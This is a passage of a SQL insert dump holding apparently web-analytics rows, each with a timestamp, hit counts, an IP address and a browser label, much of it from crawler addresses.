96.178.72','firefox'),(42726,1465291309,1,1,0,0,'130.193.51.19','other'),(42727,1465291493,1,1,0,0,'130.193.50.38','other'),(42728,1465291634,2,2,0,0,'141.8.183.25','other'),(42729,1465291859,1,1,0,0,'91.124.56.105','chrome'),(42730,1465292201,2,0,2,0,'66.249.78.164',''),(42731,1465292659,1,0,1,0,'66.249.78.171',''),(42732,1465293495,1,0,1,0,'66.249.78.178',''),(42733,1465294058,1,1,0,0,'95.135.249.55','firefox'),(42734,1465294338,1,0,1,0,'66.249.78.164',''),(42735,1465294498,1,1,0,0,'91.196.178.71','firefox'),(42736,1465294531,1,0,1,0,'66.249.78.178',''),(42737,1465295016,1,1,0,0,'130.193.50.34','other'),(42738,1465295067,1,1,0,0,'91.196.178.72','chrome'),(42739,1465295155,1,1,0,0,'130.193.51.19','other'),(42740,1465295243,1,1,0,0,'95.135.249.55','firefox'),(42741,1465295281,1,1,0,0,'141.8.183.25','other'),(42742,1465295777,1,0,1,0,'66.249.66.183',''),(42743,1465295888,1,0,1,0,'66.249.78.171',''),(42744,1465296541,1,1,0,0,'95.135.249.55','firefox'),(42745,1465296682,1,1,0,0,'91.196.178.167','chrome'),(42746,1465296953,2,0,2,0,'66.249.78.164',''),(42747,1465297107,1,0,1,0,'66.249.66.180',''),(42748,1465297477,1,1,0,0,'95.134.196.82','chrome'),(42749,1465297482,1,0,1,0,'66.249.78.150',''),(42750,1465297565,2,0,2,0,'66.249.78.178',''),(42751,1465297905,1,1,0,0,'95.135.249.55','firefox'),(42752,1465298106,1,1,0,0,'91.124.56.105','chrome'),(42753,1465298898,1,0,1,0,'66.249.66.180',''),(42754,1465298913,5,0,5,0,'66.249.78.164',''),(42755,1465299226,1,0,1,0,'66.249.78.178',''),(42756,1465299321,1,1,0,0,'94.45.145.5','msie'),(42757,1465299492,1,0,1,0,'66.249.78.171',''),(42758,1465300055,1,1,0,0,'37.53.231.248','firefox'),(42759,1465300094,1,0,1,0,'66.249.78.136',''),(42760,1465300152,1,1,0,0,'91.196.178.69','firefox'),(42761,1465301798,1,0,1,0,'66.249.78.178',''),(42762,1465301984,1,1,0,0,'157.55.39.210','other'),(42763,1465302102,2,0,2,0,'66.249.78.164',''),(42764,1465302624,1,1,0,0,'37.53.231.248','firefox'),(42765,1465303051,1,1,0,0,'91.196.178.162','firefox'),(42766,1465303275,2,0,2,0,'66.249.78.143',''),(42767,1465303436,1,0,1,0,'66.249.78.136',''),(42768,1465303560,2,2,0,0,'178.93.29.253','firefox'),(42769,1465303652,1,1,0,0,'40.77.167.57','other'),(42770,1465304245,1,1,0,0,'194.187.216.12','firefox'),(42771,1465304585,2,0,2,0,'66.249.78.178',''),(42772,1465304622,1,1,0,0,'46.211.200.114','other'),(42773,1465304643,1,0,1,0,'66.249.78.171',''),(42774,1465304825,2,0,2,0,'66.249.78.164',''),(42775,1465305592,1,0,1,0,'66.249.78.143',''),(42776,1465305611,2,0,2,0,'66.249.78.171',''),(42777,1465305998,1,0,1,0,'66.249.78.164',''),(42778,1465306541,2,0,2,0,'66.249.78.136',''),(42779,1465306814,1,1,0,0,'85.198.132.136','chrome'),(42780,1465306872,1,1,0,0,'91.196.178.70','firefox'),(42781,1465307173,4,4,0,0,'91.194.84.106','other'),(42782,1465307181,1,0,1,0,'66.249.78.178',''),(42783,1465307569,1,0,1,0,'66.249.78.136',''),(42784,1465308023,1,0,1,0,'66.249.78.171',''),(42785,1465308460,1,0,1,0,'66.249.78.143',''),(42786,1465308585,12,12,0,0,'91.121.112.142','other'),(42787,1465308706,1,0,1,0,'66.249.78.178',''),(42788,1465309243,1,0,1,0,'66.249.66.177',''),(42789,1465309339,2,0,2,0,'66.249.78.164',''),(42790,1465309358,1,1,0,0,'130.193.51.19','other'),(42791,1465310144,1,0,1,0,'66.249.78.171',''),(42792,1465310686,4,0,4,0,'66.249.78.178',''),(42793,1465311048,2,0,2,0,'66.249.78.171',''),(42794,1465311381,1,0,1,0,'66.249.78.164',''),(42795,1465311382,1,1,0,0,'141.8.183.25','other'),(42796,1465311503,1,1,0,0,'37.73.252.110','other'),(42797,1465311929,1,0,1,0,'66.249.78.143',''),(42798,1465312415,1,0,1,0,'66.249.78.164',''),(42799,1465312465,1,1,0,0,'82.145.221.24','opera'),(42800,1465312490,2,0,2,0,'66.249.78.178',''),(42801,1465313781,1,0,1,0,'66.249.66.182',''),(42802,1465314012,1,1,0,0,'66.249.93.147','chrome'),(42803,1465315124,1,1,0,0,'94.179.84.100','chrome'),(42804,1465315204,1,0,1,0,'66.249.78.164',''),(42805,1465315842,1,1,0,0,'193.194.127.217','firefox'),(42806,1465316358,1,0,1,0,'66.249.66.188',''),(42807,1465316584,1,1,0,0,'180.76.15.137','other'),(42808,1465317085,1,0,1,0,'66.249.78.150',''),(42809,1465317135,1,1,0,0,'37.55.4.252','chrome'),(42810,1465317154,1,1,0,0,'141.0.15.48','other'),(42811,1465317283,3,0,3,0,'66.249.78.178',''),(42812,1465317346,2,0,2,0,'66.249.78.164',''),(42813,1465317472,1,1,0,0,'94.179.246.43','firefox'),(42814,1465318177,2,0,2,0,'66.249.66.180',''),(42815,1465318523,1,0,1,0,'66.249.78.164',''),(42816,1465318615,1,0,1,0,'66.249.78.171',''),(42817,1465318839,2,0,2,0,'66.249.78.178',''),(42818,1465319287,1,0,1,0,'66.249.78.143',''),(42819,1465319892,1,1,0,0,'91.196.178.35','firefox'),(42820,1465320777,1,1,0,0,'94.179.37.127','firefox'),(42821,1465320852,1,0,1,0,'66.249.66.177',''),(42822,1465321288,1,0,1,0,'66.249.78.178',''),(42823,1465321407,4,0,4,0,'66.249.78.164',''),(42824,1465322485,1,0,1,0,'66.249.78.178',''),(42825,1465322677,1,1,0,0,'141.8.183.25','other'),(42826,1465323148,1,0,1,0,'66.249.78.171',''),(42827,1465323319,2,0,2,0,'66.249.78.164',''),(42828,1465323410,1,0,1,0,'66.249.78.143',''),(42829,1465323567,1,0,1,0,'66.249.78.178',''),(42830,1465324259,1,1,0,0,'212.90.47.219','chrome'),(42831,1465324520,1,1,0,0,'157.55.39.210','other'),(42832,1465325135,1,0,1,0,'66.249.78.143',''),(42833,1465325374,2,0,2,0,'66.249.78.171',''),(42834,1465325824,3,0,3,0,'66.249.78.164',''),(42835,1465325835,1,1,0,0,'94.179.36.118','firefox'),(42836,1465326247,1,1,0,0,'91.196.178.167','chrome'),(42837,1465326889,1,0,1,0,'66.249.78.178',''),(42838,1465327221,1,0,1,0,'66.249.78.136',''),(42839,1465327272,2,0,2,0,'66.249.78.171',''),(42840,1465327904,1,0,1,0,'66.249.78.164',''),(42841,1465328279,1,0,1,0,'66.249.78.150',''),(42842,1465328603,1,0,1,0,'66.249.78.136',''),(42843,1465328662,1,1,0,0,'168.235.206.199','other'),(42844,1465329765,1,0,1,0,'66.249.78.178',''),(42845,1465329965,2,0,2,0,'66.249.78.164',''),(42846,1465330407,3,0,3,0,'66.249.78.171',''),(42847,1465330678,1,0,1,0,'66.249.78.178',''),(42848,1465330855,1,1,0,0,'46.219.253.211','chrome'),(42849,1465331853,2,0,2,0,'66.249.78.164',''),(42850,1465332014,1,0,1,0,'66.249.66.185',''),(42851,1465332040,4,0,4,0,'66.249.78.178',''),(42852,1465333017,1,0,1,0,'66.249.78.171',''),(42853,1465333018,2,0,2,0,'66.249.78.164',''),(42854,1465333977,1,0,1,0,'66.249.66.182',''),(42855,1465334013,1,0,1,0,'66.249.78.171',''),(42856,1465334724,1,0,1,0,'66.249.66.177',''),(42857,1465335525,1,0,1,0,'66.249.78.178',''),(42858,1465335593,2,0,2,0,'66.249.78.164',''),(42859,1465335954,1,0,1,0,'66.249.78.171',''),(42860,1465336285,1,0,1,0,'66.249.66.177',''),(42861,1465337096,1,1,0,0,'66.249.78.164','chrome'),(42862,1465337115,1,1,0,0,'193.90.12.86','chrome'),(42863,1465337591,1,0,1,0,'66.249.78.171',''),(42864,1465338170,3,0,3,0,'66.249.78.164',''),(42865,1465338699,1,0,1,0,'66.249.78.171',''),(42866,1465339336,1,1,0,0,'130.193.51.19','other'),(42867,1465339365,1,1,0,0,'37.73.249.133','chrome'),(42868,1465339405,1,0,1,0,'66.249.78.178',''),(42869,1465339434,1,1,0,0,'66.249.78.171','chrome'),(42870,1465339761,3,3,0,0,'141.8.183.25','other'),(42871,1465339901,6,6,0,0,'130.193.50.34','other'),(42872,1465340105,1,1,0,0,'66.249.66.177','chrome'),(42873,1465340286,1,1,0,0,'141.8.142.58','other'),(42874,1465340852,1,1,0,0,'66.249.78.150','chrome'),(42875,1465343574,1,0,1,0,'66.249.78.178',''),(42876,1465344358,1,0,1,0,'66.249.78.136',''),(42877,1465344630,1,0,1,0,'66.249.78.178',''),(42878,1465344753,1,0,1,0,'66.249.78.171',''),(42879,1465346313,1,0,1,0,'66.249.78.164',''),(42880,1465347169,1,0,1,0,'66.249.66.180',''),(42881,1465347345,1,0,1,0,'66.249.78.164',''),(42882,1465347556,1,0,1,0,'66.249.78.143',''),(42883,1465347567,1,0,1,0,'66.249.66.185',''),(42884,1465348978,1,1,0,0,'130.193.51.19','other'),(42885,1465349657,1,0,1,0,'66.249.78.164',''),(42886,1465349724,1,1,0,0,'141.8.132.41','other'),(42887,1465350177,1,0,1,0,'66.249.66.188',''),(42888,1465350242,1,1,0,0,'40.77.167.57','other'),(42889,1465350318,1,0,1,0,'66.249.78.171',''),(42890,1465350470,1,0,1,0,'66.249.78.136',''),(42891,1465351298,3,0,3,0,'66.249.78.164',''),(42892,1465352039,1,0,1,0,'66.249.78.178',''),(42893,1465352195,1,1,0,0,'130.193.51.19','other'),(42894,1465352453,1,1,0,0,'130.193.50.4','other'),(42895,1465352678,1,0,1,0,'66.249.78.143',''),(42896,1465352896,1,0,1,0,'66.249.66.180',''),(42897,1465353716,2,0,2,0,'66.249.78.178',''),(42898,1465355342,1,0,1,0,'66.249.66.177',''),(42899,1465355449,1,0,1,0,'66.249.78.143',''),(42900,1465355811,1,0,1,0,'66.249.78.178',''),(42901,1465356199,1,0,1,0,'66.249.78.171',''),(42902,1465356888,1,0,1,0,'66.249.78.178',''),(42903,1465357215,1,0,1,0,'66.249.78.136',''),(42904,1465358248,1,0,1,0,'66.249.78.136',''),(42905,1465358643,1,0,1,0,'66.249.78.178',''),(42906,1465359170,1,0,1,0,'66.249.66.180',''),(42907,1465360930,2,2,0,0,'178.94.172.47','chrome'),(42908,1465362546,1,0,1,0,'66.249.78.164',''),(42909,1465363136,1,0,1,0,'66.249.78.171',''),(42910,1465363228,1,1,0,0,'178.93.53.95','firefox'),(42911,1465364010,1,1,0,0,'130.193.51.19','other'),(42912,1465364336,1,1,0,0,'91.196.178.71','chrome'),(42913,1465364932,1,1,0,0,'95.133.197.45','chrome'),(42914,1465365613,1,1,0,0,'91.196.178.66','chrome'),(42915,1465367306,1,1,0,0,'31.41.64.148','chrome'),(42916,1465368114,1,1,0,0,'95.135.59.78','firefox'),(42917,1465368271,1,1,0,0,'91.196.178.35','firefox'),(42918,1465368349,1,1,0,0,'91.196.178.68','firefox'),(42919,1465368510,2,0,2,0,'66.249.66.188',''),(42920,1465368816,1,0,1,0,'66.249.66.183',''),(42921,1465369152,1,1,0,0,'66.249.78.164','chrome'),(42922,1465369843,1,1,0,0,'95.135.59.78','firefox'),(42923,1465370324,1,1,0,0,'82.207.91.234','firefox'),(42924,1465370978,5,0,5,0,'66.249.78.164',''),(42925,1465371106,2,0,2,0,'66.249.78.178',''),(42926,1465371189,2,0,2,0,'66.249.78.171',''),(42927,1465371194,1,0,1,0,'66.249.66.180',''),(42928,1465371206,2,0,2,0,'66.249.66.177',''),(42929,1465371208,1,0,1,0,'66.249.78.150',''),(42930,1465372209,1,1,0,0,'130.193.50.34','other'),(42931,1465372871,1,1,0,0,'93.171.243.149','opera'),(42932,1465373116,1,0,1,0,'66.249.66.180',''),(42933,1465373271,2,0,2,0,'66.249.78.171',''),(42934,1465373469,1,0,1,0,'66.249.78.150',''),(42935,1465373483,1,0,1,0,'66.249.78.143',''),(42936,1465373514,2,0,2,0,'66.249.78.164',''),(42937,1465373517,1,0,1,0,'66.249.66.182',''),(42938,1465373718,1,1,0,0,'178.92.91.77','firefox'),(42939,1465374605,1,0,1,0,'66.249.78.164',''),(42940,1465374636,1,1,0,0,'94.179.88.214','firefox'),(42941,1465374660,1,1,0,0,'130.193.51.19','other'),(42942,1465375101,2,0,2,0,'66.249.78.143',''),(42943,1465375363,1,1,0,0,'37.139.164.145','chrome'),(42944,1465375631,1,0,1,0,'66.249.78.164',''),(42945,1465376458,1,1,0,0,'37.139.164.145','chrome'),(42946,1465376946,1,0,1,0,'66.249.78.136',''),(42947,1465377017,1,1,0,0,'46.219.2.9','chrome'),(42948,1465377145,1,0,1,0,'66.249.78.143',''),(42949,1465377426,1,0,1,0,'66.249.66.185',''),(42950,1465377735,1,1,0,0,'66.249.78.150','chrome'),(42951,1465378509,1,0,1,0,'66.249.78.171',''),(42952,1465378663,1,0,1,0,'66.249.78.143',''),(42953,1465378730,2,2,0,0,'91.196.177.94','chrome'),(42954,1465379119,1,0,1,0,'66.249.78.178',''),(42955,1465379899,1,1,0,0,'95.134.207.254','chrome'),(42956,1465379955,1,1,0,0,'91.196.177.94','chrome'),(42957,1465380343,1,0,1,0,'66.249.78.171',''),(42958,1465380464,2,0,2,0,'66.249.78.178',''),(42959,1465381439,1,1,0,0,'82.207.16.42','chrome'),(42960,1465381481,1,1,0,0,'91.196.178.66','firefox'),(42961,1465382194,1,1,0,0,'130.180.212.177','chrome'),(42962,1465382611,1,1,0,0,'130.193.50.34','other'),(42963,1465383407,1,1,0,0,'46.200.27.20','opera'),(42964,1465383767,1,0,1,0,'66.249.78.178',''),(42965,1465384420,1,0,1,0,'66.249.78.143',''),(42966,1465384461,1,0,1,0,'66.249.66.183',''),(42967,1465384700,1,0,1,0,'66.249.78.150',''),(42968,1465384872,1,0,1,0,'66.249.78.178',''),(42969,1465384937,1,1,0,0,'91.196.177.96','firefox'),(42970,1465385031,1,1,0,0,'91.222.15.10','chrome'),(42971,1465385341,1,1,0,0,'178.93.244.149','chrome'),(42972,1465385614,1,1,0,0,'130.193.51.19','other'),(42973,1465386809,2,0,2,0,'66.249.78.164',''),(42974,1465387416,1,1,0,0,'37.53.224.248','firefox'),(42975,1465387675,1,0,1,0,'66.249.78.178',''),(42976,1465387785,1,1,0,0,'141.8.142.58','other'),(42977,1465387802,1,1,0,0,'46.174.243.167','chrome'),(42978,1465387809,1,1,0,0,'93.183.204.29','other'),(42979,1465387943,1,1,0,0,'95.133.63.67','opera'),(42980,1465388018,1,1,0,0,'130.193.51.19','other'),(42981,1465388142,1,1,0,0,'141.8.142.61','other'),(42982,1465388147,1,0,1,0,'66.249.78.150',''),(42983,1465388373,2,0,2,0,'66.249.78.171',''),(42984,1465388514,4,4,0,0,'91.196.178.103','firefox'),(42985,1465388721,1,1,0,0,'176.67.16.79','chrome'),(42986,1465388824,1,0,1,0,'66.249.78.178',''),(42987,1465388923,1,1,0,0,'141.8.142.58','other'),(42988,1465388971,1,0,1,0,'66.249.78.164',''),(42989,1465389494,1,0,1,0,'66.249.66.183',''),(42990,1465389832,1,0,1,0,'66.249.78.171',''),(42991,1465389956,1,1,0,0,'193.194.127.224','firefox'),(42992,1465390194,1,1,0,0,'94.179.102.6','firefox'),(42993,1465390681,1,0,1,0,'66.249.78.178',''),(42994,1465390733,4,0,4,0,'66.249.78.164',''),(42995,1465390990,1,1,0,0,'37.53.224.248','firefox'),(42996,1465391106,2,0,2,0,'66.249.66.177',''),(42997,1465391135,1,0,1,0,'66.249.78.171',''),(42998,1465391236,1,1,0,0,'94.179.91.71','chrome'),(42999,1465391371,1,0,1,0,'66.249.78.150',''),(43000,1465391590,1,0,1,0,'66.249.78.143',''),(43001,1465391822,1,1,0,0,'46.174.243.167','chrome'),(43002,1465393148,1,1,0,0,'91.196.178.71','chrome'),(43003,1465393285,1,1,0,0,'95.133.197.45','chrome'),(43004,1465393410,1,1,0,0,'91.196.178.65','firefox'),(43005,1465393743,1,1,0,0,'130.193.51.79','other'),(43006,1465394317,1,0,1,0,'66.249.78.171',''),(43007,1465394806,2,1,1,0,'66.249.78.164',''),(43008,1465394867,1,1,0,0,'40.77.167.57','other'),(43009,1465394971,1,0,1,0,'66.249.78.143',''),(43010,1465395219,1,1,0,0,'66.249.78.178','chrome'),(43011,1465395318,2,0,2,0,'66.249.78.171',''),(43012,1465395487,1,0,1,0,'66.249.78.136',''),(43013,1465395490,1,1,0,0,'94.178.98.32','chrome'),(43014,1465395685,1,1,0,0,'66.249.78.164','chrome'),(43015,1465395769,1,1,0,0,'130.193.51.19','other'),(43016,1465395783,1,1,0,0,'157.55.39.28','other'),(43017,1465395913,1,1,0,0,'141.8.183.25','other'),(43018,1465396228,1,1,0,0,'130.193.50.34','other'),(43019,1465396358,1,1,0,0,'91.196.178.70','firefox'),(43020,1465396415,2,0,2,0,'66.249.78.171',''),(43021,1465396698,1,0,1,0,'66.249.66.180',''),(43022,1465396935,1,0,1,0,'66.249.78.178',''),(43023,1465397464,1,0,1,0,'66.249.78.164',''),(43024,1465398441,1,1,0,0,'141.8.183.25','other'),(43025,1465398597,1,0,1,0,'66.249.78.178',''),(43026,1465399240,1,1,0,0,'141.8.142.61','other'),(43027,1465399973,1,1,0,0,'130.193.50.34','other'),(43028,1465400936,1,1,0,0,'91.196.178.72','chrome'),(43029,1465401459,1,1,0,0,'66.249.78.178','chrome'),(43030,1465402722,1,1,0,0,'40.77.167.57','other'),(43031,1465402855,1,0,1,0,'66.249.78.171',''),(43032,1465404409,1,0,1,0,'66.249.78.150',''),(43033,1465405294,1,0,1,0,'66.249.66.177',''),(43034,1465405390,1,1,0,0,'130.193.50.34','other'),(43035,1465405641,2,0,2,0,'66.249.78.164',''),(43036,1465405864,1,1,0,0,'91.196.178.134','firefox'),(43037,1465405912,2,0,2,0,'66.249.78.171',''),(43038,1465406485,2,0,2,0,'66.249.78.178',''),(43039,1465406783,1,0,1,0,'66.249.66.180',''),(43040,1465407062,1,1,0,0,'91.196.178.35','firefox'),(43041,1465407731,1,1,0,0,'130.193.50.34','other'),(43042,1465407824,1,1,0,0,'141.8.183.19','other'),(43043,1465408868,1,0,1,0,'66.249.78.136',''),(43044,1465408985,1,0,1,0,'66.249.78.178',''),(43045,1465409193,2,0,2,0,'66.249.78.143',''),(43046,1465409501,1,1,0,0,'193.194.127.217','firefox'),(43047,1465409514,1,0,1,0,'66.249.66.180',''),(43048,1465410707,1,0,1,0,'66.249.66.177',''),(43049,1465410865,1,0,1,0,'66.249.78.171',''),(43050,1465411205,1,0,1,0,'66.249.78.178',''),(43051,1465411532,1,0,1,0,'66.249.78.164',''),(43052,1465412027,1,0,1,0,'66.249.66.182',''),(43053,1465412401,1,0,1,0,'66.249.78.178',''),(43054,1465413101,1,1,0,0,'91.196.178.167','firefox'),(43055,1465413596,1,0,1,0,'66.249.78.171',''),(43056,1465413987,1,1,0,0,'94.179.246.43','firefox'),(43057,1465414337,1,0,1,0,'66.249.66.183',''),(43058,1465415552,1,0,1,0,'66.249.66.177',''),(43059,1465415824,1,0,1,0,'66.249.78.164',''),(43060,1465415842,2,0,2,0,'66.249.78.171',''),(43061,1465416172,1,0,1,0,'66.249.78.143',''),(43062,1465416504,1,0,1,0,'66.249.78.178',''),(43063,1465417029,1,1,0,0,'40.77.167.57','other'),(43064,1465417297,1,0,1,0,'66.249.78.164',''),(43065,1465417512,1,1,0,0,'95.215.218.182','chrome'),(43066,1465417632,1,0,1,0,'66.249.78.178',''),(43067,1465418379,1,0,1,0,'66.249.78.171',''),(43068,1465418578,1,0,1,0,'66.249.78.164',''),(43069,1465419023,1,1,0,0,'195.154.185.20','other'),(43070,1465419689,2,0,2,0,'66.249.78.178',''),(43071,1465419994,2,0,2,0,'66.249.78.171',''),(43072,1465420768,1,0,1,0,'66.249.78.178',''),(43073,1465421103,1,0,1,0,'66.249.78.164',''),(43074,1465421229,1,0,1,0,'66.249.78.136',''),(43075,1465421861,1,0,1,0,'66.249.78.178',''),(43076,1465422270,1,1,0,0,'37.73.219.131','chrome'),(43077,1465422953,1,0,1,0,'66.249.78.164',''),(43078,1465423176,1,0,1,0,'66.249.78.178',''),(43079,1465423417,1,0,1,0,'66.249.66.183',''),(43080,1465423993,1,0,1,0,'66.249.78.164',''),(43081,1465424343,1,0,1,0,'66.249.66.183',''),(43082,1465424501,1,1,0,0,'130.193.50.34','other'),(43083,1465424948,1,0,1,0,'66.249.78.143',''),(43084,1465426771,1,1,0,0,'5.255.253.4','other'),(43085,1465427045,1,0,1,0,'66.249.78.178',''),(43086,1465427059,1,1,0,0,'40.77.167.57','other'),(43087,1465427837,2,0,2,0,'66.249.78.171',''),(43088,1465428537,1,1,0,0,'141.8.142.58','other'),(43089,1465429232,3,0,3,0,'66.249.78.164',''),(43090,1465429701,2,0,2,0,'66.249.78.171',''),(43091,1465431250,1,0,1,0,'66.249.78.178',''),(43092,1465431513,13,13,0,0,'178.255.215.94','other'),(43093,1465432455,1,1,0,0,'130.193.51.19','other'),(43094,1465433073,1,0,1,0,'66.249.78.171',''),(43095,1465433135,1,0,1,0,'68.180.229.171',''),(43096,1465433431,1,0,1,0,'66.249.78.178',''),(43097,1465433864,1,1,0,0,'130.193.50.34','other'),(43098,1465433933,1,0,1,0,'66.249.78.164',''),(43099,1465434215,1,1,0,0,'66.249.78.171','chrome'),(43100,1465434324,1,1,0,0,'66.249.78.143','chrome'),(43101,1465434524,1,1,0,0,'66.249.78.164','chrome'),(43102,1465434526,1,1,0,0,'141.8.183.25','other'),(43103,1465435258,1,1,0,0,'141.8.142.61','other'),(43104,1465435740,1,0,1,0,'66.249.78.164',''),(43105,1465435899,2,1,1,0,'66.249.78.164',''),(43106,1465436011,1,0,1,0,'66.249.66.183',''),(43107,1465436022,1,1,0,0,'141.8.183.25','other'),(43108,1465436220,1,1,0,0,'130.193.51.19','other'),(43109,1465437167,4,0,4,0,'66.249.78.178',''),(43110,1465437316,1,0,1,0,'66.249.78.143',''),(43111,1465437367,2,0,2,0,'66.249.78.171',''),(43112,1465438104,1,0,1,0,'66.249.78.178',''),(43113,1465439068,1,0,1,0,'66.249.78.171',''),(43114,1465439088,1,0,1,0,'66.249.78.164',''),(43115,1465439194,1,0,1,0,'66.249.66.180',''),(43116,1465439328,1,1,0,0,'130.193.51.19','other'),(43117,1465440299,1,0,1,0,'66.249.78.178',''),(43118,1465440863,1,0,1,0,'66.249.78.164',''),(43119,1465441252,1,0,1,0,'66.249.78.136',''),(43120,1465441635,1,0,1,0,'66.249.66.183',''),(43121,1465441933,1,0,1,0,'66.249.66.185',''),(43122,1465442088,1,1,0,0,'141.8.142.61','other'),(43123,1465442142,1,0,1,0,'66.249.78.171',''),(43124,1465442234,1,0,1,0,'66.249.78.164',''),(43125,1465442473,1,0,1,0,'66.249.66.177',''),(43126,1465443193,1,0,1,0,'66.249.78.164',''),(43127,1465443630,1,0,1,0,'66.249.66.188',''),(43128,1465443668,15,15,0,0,'173.234.159.250','other'),(43129,1465444073,1,1,0,0,'51.254.97.192','other'),(43130,1465444132,2,0,2,0,'66.249.78.178',''),(43131,1465444773,1,0,1,0,'66.249.78.164',''),(43132,1465444843,1,0,1,0,'66.249.78.143',''),(43133,1465444929,1,0,1,0,'66.249.78.171',''),(43134,1465444950,1,0,1,0,'66.249.66.180',''),(43135,1465445198,2,0,2,0,'66.249.78.178',''),(43136,1465445220,4,4,0,0,'69.30.198.242','other'),(43137,1465446294,1,0,1,0,'66.249.78.164',''),(43138,1465446701,1,0,1,0,'66.249.78.171',''),(43139,1465448922,1,0,1,0,'66.249.78.171',''),(43140,1465449600,1,0,1,0,'66.249.78.178',''),(43141,1465450251,1,1,0,0,'91.196.178.163','chrome'),(43142,1465450425,3,0,3,0,'66.249.78.171',''),(43143,1465450689,1,0,1,0,'66.249.78.164',''),(43144,1465450721,1,1,0,0,'91.196.177.96','firefox'),(43145,1465450979,1,1,0,0,'141.8.142.58','other'),(43146,1465451123,1,1,0,0,'130.193.50.34','other'),(43147,1465451265,1,1,0,0,'46.201.252.196','chrome'),(43148,1465451324,1,1,0,0,'91.196.178.68','chrome'),(43149,1465451536,1,1,0,0,'95.133.197.45','chrome'),(43150,1465451640,1,0,1,0,'66.249.78.178',''),(43151,1465452344,1,0,1,0,'66.249.78.171',''),(43152,1465452720,1,0,1,0,'66.249.78.150',''),(43153,1465453108,1,0,1,0,'66.249.78.164',''),(43154,1465453271,1,1,0,0,'141.8.142.61','other'),(43155,1465453397,1,1,0,0,'93.158.152.40','other'),(43156,1465453566,1,1,0,0,'141.8.142.67','other'),(43157,1465453696,1,0,1,0,'66.249.78.171',''),(43158,1465453797,1,0,1,0,'66.249.78.178',''),(43159,1465453879,1,1,0,0,'78.111.189.22','chrome'),(43160,1465453984,1,0,1,0,'66.249.78.143',''),(43161,1465454549,1,1,0,0,'91.196.177.8','chrome'),(43162,1465454567,1,1,0,0,'91.196.178.68','chrome'),(43163,1465455100,1,1,0,0,'91.124.238.64','chrome'),(43164,1465455536,1,0,1,0,'66.249.78.178',''),(43165,1465455999,1,0,1,0,'66.249.78.164',''),(43166,1465456196,1,1,0,0,'91.196.178.65','firefox'),(43167,1465456521,4,0,4,0,'66.249.78.178',''),(43168,1465456553,1,1,0,0,'91.196.178.69','firefox'),(43169,1465456630,1,0,1,0,'66.249.78.171',''),(43170,1465456694,1,1,0,0,'91.124.238.64','chrome'),(43171,1465456867,1,1,0,0,'91.196.178.163','chrome'),(43172,1465457600,1,1,0,0,'91.124.238.64','chrome'),(43173,1465457993,1,0,1,0,'66.249.78.171',''),(43174,1465458213,1,0,1,0,'66.249.78.164',''),(43175,1465458582,1,0,1,0,'66.249.66.177',''),(43176,1465459677,1,0,1,0,'66.249.66.180',''),(43177,1465459766,1,0,1,0,'66.249.78.171',''),(43178,1465459894,1,1,0,0,'91.196.178.98','chrome'),(43179,1465459965,2,0,2,0,'66.249.78.178',''),(43180,1465459990,1,1,0,0,'37.53.227.220','firefox'),(43181,1465460740,1,1,0,0,'91.196.177.8','chrome'),(43182,1465460921,1,0,1,0,'66.249.78.171',''),(43183,1465461498,1,1,0,0,'78.25.31.34','chrome'),(43184,1465461517,1,1,0,0,'91.196.178.129','firefox'),(43185,1465462217,1,0,1,0,'66.249.66.177',''),(43186,1465462218,1,0,1,0,'66.249.78.164',''),(43187,1465462312,1,0,1,0,'66.249.78.136',''),(43188,1465462715,2,0,2,0,'66.249.78.171',''),(43189,1465463668,1,1,0,0,'91.196.178.65','chrome'),(43190,1465463816,1,1,0,0,'40.77.167.57','other'),(43191,1465464169,1,1,0,0,'37.53.214.62','opera'),(43192,1465464303,3,0,3,0,'66.249.78.164',''),(43193,1465464327,2,2,0,0,'141.8.142.61','other'),(43194,1465465299,1,0,1,0,'66.249.78.150',''),(43195,1465465403,2,0,2,0,'66.249.78.171',''),(43196,1465465790,1,1,0,0,'91.244.5.250','chrome'),(43197,1465466043,1,1,0,0,'180.76.15.135','other'),(43198,1465466047,1,0,1,0,'66.249.78.136',''),(43199,1465466121,1,0,1,0,'66.249.66.180',''),(43200,1465466237,2,0,2,0,'66.249.78.164',''),(43201,1465466432,2,1,1,0,'66.249.78.136',''),(43202,1465466791,1,1,0,0,'109.227.97.28','firefox'),(43203,1465466938,2,0,2,0,'66.249.78.171',''),(43204,1465467103,1,1,0,0,'178.95.250.89','chrome'),(43205,1465467304,1,1,0,0,'66.249.78.150','chrome'),(43206,1465467377,1,0,1,0,'66.249.78.143',''),(43207,1465467667,2,0,2,0,'66.249.66.180',''),(43208,1465468427,1,0,1,0,'66.249.66.183',''),(43209,1465468762,1,0,1,0,'66.249.78.136',''),(43210,1465468900,1,0,1,0,'66.249.66.180',''),(43211,1465469055,3,0,3,0,'66.249.78.178',''),(43212,1465469343,1,0,1,0,'66.249.78.164',''),(43213,1465469555,1,0,1,0,'66.249.78.171',''),(43214,1465469964,1,1,0,0,'66.249.93.153','chrome'),(43215,1465470475,1,0,1,0,'66.249.78.178',''),(43216,1465470791,2,0,2,0,'66.249.78.164',''),(43217,1465472162,1,1,0,0,'141.8.142.61','other'),(43218,1465472177,3,0,3,0,'66.249.78.164',''),(43219,1465472549,1,1,0,0,'109.162.1.251','chrome'),(43220,1465472927,1,1,0,0,'91.196.178.69','firefox'),(43221,1465473177,2,2,0,0,'91.196.178.67','chrome'),(43222,1465473346,1,0,1,0,'66.249.78.171',''),(43223,1465474118,2,0,2,0,'66.249.78.178',''),(43224,1465474574,1,1,0,0,'37.52.18.184','chrome'),(43225,1465475198,2,0,2,0,'66.249.78.171',''),(43226,1465475252,1,1,0,0,'94.179.92.29','firefox'),(43227,1465475457,1,1,0,0,'91.196.178.69','firefox'),(43228,1465475929,1,0,1,0,'66.249.69.175',''),(43229,1465476080,2,0,2,0,'66.249.78.164',''),(43230,1465476259,1,0,1,0,'66.249.78.136',''),(43231,1465476323,1,1,0,0,'37.53.227.220','firefox'),(43232,1465476341,1,1,0,0,'157.55.39.210','other'),(43233,1465476525,2,0,2,0,'66.249.78.171',''),(43234,1465477431,1,0,1,0,'66.249.78.136',''),(43235,1465478072,1,1,0,0,'91.124.49.156','chrome'),(43236,1465478132,1,0,1,0,'66.249.69.249',''),(43237,1465478246,1,0,1,0,'66.249.78.178',''),(43238,1465478648,2,2,0,0,'130.193.51.19','other'),(43239,1465478686,1,1,0,0,'176.67.16.187','chrome'),(43240,1465478979,1,0,1,0,'66.249.78.164',''),(43241,1465479032,1,0,1,0,'66.249.78.171',''),(43242,1465479194,1,1,0,0,'91.196.178.69','firefox'),(43243,1465480382,1,1,0,0,'91.196.178.167','chrome'),(43244,1465480471,2,0,2,